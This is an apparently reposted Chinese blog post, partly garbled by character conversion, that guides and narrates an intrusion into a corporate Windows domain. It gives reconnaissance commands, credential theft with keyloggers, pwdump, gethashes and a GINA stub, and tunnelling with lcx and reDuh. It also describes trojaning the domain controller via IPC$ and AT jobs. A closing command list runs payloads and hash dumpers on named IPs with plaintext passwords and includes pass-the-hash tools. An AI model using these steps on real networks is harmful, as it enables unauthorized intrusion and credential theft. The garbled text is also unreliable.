内网***经常使用命令

时间 2019-11-08

标签经常使用命令繁體版

原文原文链接

1.收集信息。 html

　　1-1.不管是什么途径得到的内网机器，肯定他在内网后，咱们首先就要了解这台机器的所属人员，若是咱们的目标是公司，那咱们就要了解这我的在公司里的职位，他是个什么身份，有多大的权利，这都关系到他在内网里的权限。由于，做为大公司，一个高权限的人他在内网里所要用到的东西就多，那么相对他的机器，固然权限就会比通常普通员工的高不少，这在个人***过程当中是常见的。java

　　既然有了他的机器，那么翻翻他的电脑这是必要的，若是你说要怎么翻，你能够尝试熟悉他的电脑甚至比他本人还熟，那你就算了解详细了。一台我的用的电脑，从上面翻出与他本身相关的一些信息，和大量公司信息应该是没有问题的，除非，这是台新电脑。node

　　1-2.了解了必定的人员信息，期间你要记下你所掌握到的帐号，密码这些重要数据，之后有必定的用，因此，在你渗以前，不妨建个记事本将重要信息保存起来，写个记事本不会浪费你多少时间。接下来，咱们就应该对这个网络进行必定的了解，他是通常的内网，仍是域?通常大公司都会用域的，咱们只须要查一下就知道，要想对他进行***，你就必须了解他的网络拓补，固然，一些太具体的物理上咱们是没法了解的，咱们只能了解咱们所能知道的。无论他是INT，DMZ，LAN，咱们必须足够掌握。在这，咱们就会用到必定的命令，相信你们应该都很熟悉。服务器

　　ipconfig /all 查询一下本机的一些状况，IP段网关属于不属于域网络

　　net view 查询一些存在联系的机器，通常以机器名显示，咱们须要对其PING出IP，一是方便查询哪些重要机器的IP，二是方便查询存在几个段dom

　　net view /domain 查询有几个域由于大型网络里面通常不止一个域的ide

　　net group /domain 查询域里面的组工具

　　net user /domain 查询域用户测试

　　net group "domain admins" /domain 查询域管理用户组spa

　　这些都是咱们须要了解的，固然有时候还会须要再查询一些信息，NET命令下大家都会找到，不须要我再重复，具体的状况具体分析问题。

　　2.信息归档

　　2-1。有了信息，咱们就要对信息进行必定的归档，将每一个机器名所对应的IP归档，方便用时不会乱。

　　2-2。查询出的用户，管理员，咱们也必须归档。

　　2-3。查询信息时可能出现的有利用价值信息必须归档。

　　3.技术利用

　　3-1。不管是经过键盘记录。或者HASH的抓取，咱们须要将帐号，密码，邮箱，凡是涉及关键数据的所有保存，一方面是准备***的资料，二是防止当前利用机器会掉。

　　3-1-1。利用远控的键盘记录进行抓取。

　　3-1-2。利用PWDUMP7或者GETHASHES进行抓取HASH，而后破解。GETHASHES V1.4后能够抓取域的所有HASH。

　　3-1-3。用GINASTUB.DLL获取管理员的帐号和密码。由于域管理员有权限登录任何一台机器。种上这个只是方便记录他所登录的密码。INSTALL后，会在SYSYTEM32下生成一个 FAXMODE.INC 文件记录密码。

　　3-2。有了内网，不少东西咱们是没有必要直接在当前利用机器上操做的，别人虽然是内网，可是不表明他没有防护系统，因此，咱们创建SOCKS或者×××是颇有必要的，创建SOCKS相信你们都会了吧。

　　3-2-1。我在这推荐 VIDC 这个工具，很方便，在CMD下直接操 VIDC.EXE -D -P PORT 就能够了。

　　3-2-2。在利用机器上使用LCX，CMD下 LCX.EXE -SLAVE 服务器IP PORT 127.0.0.1 PORT，而后到服务器上 CMD下 LCX.EXE -LISTEN 服务器IP PORT 任意PORT。

　　3-2-3。创建SOCKS后在本地能够用SOCKSCAP来进行链接，成功链接后该操做什么就看大家本身了。

　　基本上咱们就只能操做这么多了，后面已经没有什么技术上的再使用或利用，可是这中间的经验很多，所须要处理的细节也很多。

　　咱们在获得内网机器后，若是他存在域，可是没有使用域帐号怎么办?那咱们只能查询或者想尽一切手段得到他经常使用的帐号密码，而后利用这个帐号密码，再经过SOCKS进入域。这其中就关系到各位同行查看控制机器的文件，还有记录密码，GINA，HASH破解，这些都是必须的。

　　进入域后，咱们又该怎么作，创建SOCKS后又该怎么作。咱们能够扔S上去查看主要的端口，咱们能够对端口进行弱口令的尝试，咱们能够针对内网的WEB进行检测，方式不少，甚至你能够用MS08-067对另外一台机器进行突破，可是相信我，能使用域的机器，大部分都是补丁打齐的。咱们能利用的不多，可是不能灰心，只要能在内网穿梭，咱们至少在防护上会轻松不少，咱们须要的只是耐心和时间。

　　一旦拥有密码，咱们就能够尝试IPC链接，直接拿下域，这就得看大家的权限有多大。

　　net use \\IP\ipc$ password /user:username@domain

　　推荐使用这样的方式输入帐号和密码，为何?若是用户名存在空格，你这样输会保险些。什么域用户不能存在空格?

　　是的，之前我也认为不会，微软的讲师也说不会，不过，通过个人测试和经验，那是假的，域彻底能够空格，除了 user name 这样的，还能够存在　user na me ，不信　你能够试试。

　　创建IPC后，你只是想COPY文件　或者 RAR文件　再或者种马　那就是你的自由了。

　　后话：最近由于在渗域，在***过程当中，也确实出现一些问题，几回都是不知如何进行，其实在技术上，并无什么障碍。主要是在于对方有着比较强的主防护，而个人远控最开始连CMD都没法执行，后通过几天的环境测试，突破了CMD。有了CMD后，进行了查询，得到了一些信息，就开始了往下的***，被控机器的密码我不是跑出来的，我是翻他的文件翻出他经常使用密码的。由于他没有使用域帐号，都是以系统帐号登录，因此没法查看域。我只能用他的域帐号创建IPC链接，查找到内网的一个WEB服务，将其***后才算拿下了一个稳定的内网机器。

　　拿下内网WEB服务器后，我就已经彻底在域内，没有使用HASH INJECTION，我是先查询了DOMAIN ADMINS，发现WEB服务器上的帐号就属于这个组，PW后获得了HASH，破解掉我就连向了域控服务器的IPC$。

　　链接了IPC$，直接在其SYSYTEM32下扔了一个远控，而后用AT命令将其启动，这期间我尝试了5个SHIFT，可是SHIFT关闭后，个人远控也会掉，因此排除了这种方法，仍是用AT来ADD NEW JOB 比较方便。

　　给域控服务器种了远控，利用CMD来GETHASHES了所有的HASHES进行破解，很幸运的查到了文件管理组的用户，这才有了我后面的目标达成。

总的来讲，我此次的***比较运气好，中间麻烦事不是太多，不过也花了半个月的时间，时间大部分花在测试防护环境，软件免杀，***免杀，查找资料这些上面。

　　后来，我获取了他的网络拓补图，发现我所呆的区域只是一个小小的域，还有好几个域我尚未涉及到，在域的前面是DMZ，而DMZ前面固然是INT了。

　　已经很晚了，原本是在写一份详细的***过程，不过由于一直工做，不少细节没有办法当场记录，因此，暂时在BLOG上写一些能想到的，后面若是有时间有环境，会再补充更多的细节以及图片和在***时所遇到的麻烦，如何解决等写出来。

　　经常使用命令

　　net view

　　查看同一域/工做组的计算机列表

　　net view /domain

　　查看域/工做组列表

　　net view /domain:Secwing

　　查看Secwing域中计算机列表

　　net group /domain

　　查看所在域的组

　　net user /domain

　　查看所在域用户

　　net user /domain zerosoul 12345678

　　修改域用户密码，须要域管理员权限，或者Ctrl+Alt+Del点击修改则不须要域管理员权限

　　net localgroup administrators SECWING\zerosoul /add

　　域Users组用户添加到本地Administrators组，须要本地管理员或域管理员在本机登录域后进行

　　下面的命令只能用于域控制器:

　　net group "Domain controllers"

　　查看域控制器(若是有多台)

　　net group

　　查看域的组

　　net group "domain admins"

　　查看域管理员

　　net group "domain users"

　　查看域管理员

　　PS:打开配置域控制器向导的命令

　　dcpromo

　　psexec /accepteula 绕过第一次验证窗口

　　mstsc/admin 解决hash没法抓出问题

　　wmic /node:172.16.19.96 /user:ABIMAQ\Administrator /password:k78m90 process call create c:\kav\2009.exe

　　psexec.exe -s -u administrator -p k78m90 \\172.16.16.2 -c c:\kav\2009.exe 拷贝文件而且执行

　　psexec.exe -s -u administrator -p km3h7i \\172.16.16.2 -c c:\kav\gsecdump.exe -u 抓取hash

　　net use \\172.16.16.2\IPC$ "k78m90" /user:"admintitrator"

　　net use \\172.16.16.2\IPC$ "k78m90" /user:"aABIMAQ\Administrator"

　　net time \\172.16.16.2

　　at \\172.16.16.2 13:50 2009.exe

　　java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh链接命令

　　[createTunnel]1234:127.0.0.1:3389 端口转向命令

　　iam-alt -h user-hash 这样hash就被注入了

　　whosthere-alt.exe 来查看是否被注入成功。